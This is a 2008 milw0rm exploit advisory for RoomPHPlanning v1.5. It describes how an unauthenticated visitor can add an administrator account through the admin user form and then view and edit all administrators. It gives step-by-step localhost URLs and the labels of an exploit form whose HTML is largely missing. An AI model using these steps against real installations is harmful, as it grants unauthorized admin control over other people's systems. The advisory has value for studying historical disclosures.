########################################### {+} RoomPHPlanning v1.5 remote Arbitrary Add Admin Users Vulnerability {+} Script download :http://www.beaussier.com/roomphplanning/telecharge.php {+} Founded by : Stack {+} Greetz : All friends & muslims HaCkeRs... ########################################### DESCRIPTION: RoomPHPlanning is vulnerable to add user whit go to link [see down] in colon Nom write any name and in colon login whrite your adress email after password and the colon priviléges is adminstrator after click [enregistrer ] Vulnerability: go to this link for add admin user 1 : http://localhost/path/admin/userform.php go this link for login in 2 : http://localhost/path/login.php after login in go to admin link 3 : http://localhost/path/admin/ for see all administrator & edit it 4 : http://localhost/path/admin/?user=1 after execute the command for add user or for login in the page is not changed it's necessary go to second link 1 2 3 4 EXPLOIT HTML : ------------------------------------------------------------------------------------- RoomPHPlanning add Admin user

Nom

Login email

Mot de passe

Privilèges


------------------------------------------------------------------------------------- GREETZ: http://real-hack.com ----------------------------------------------------------------------------- # milw0rm.com [2008-05-26]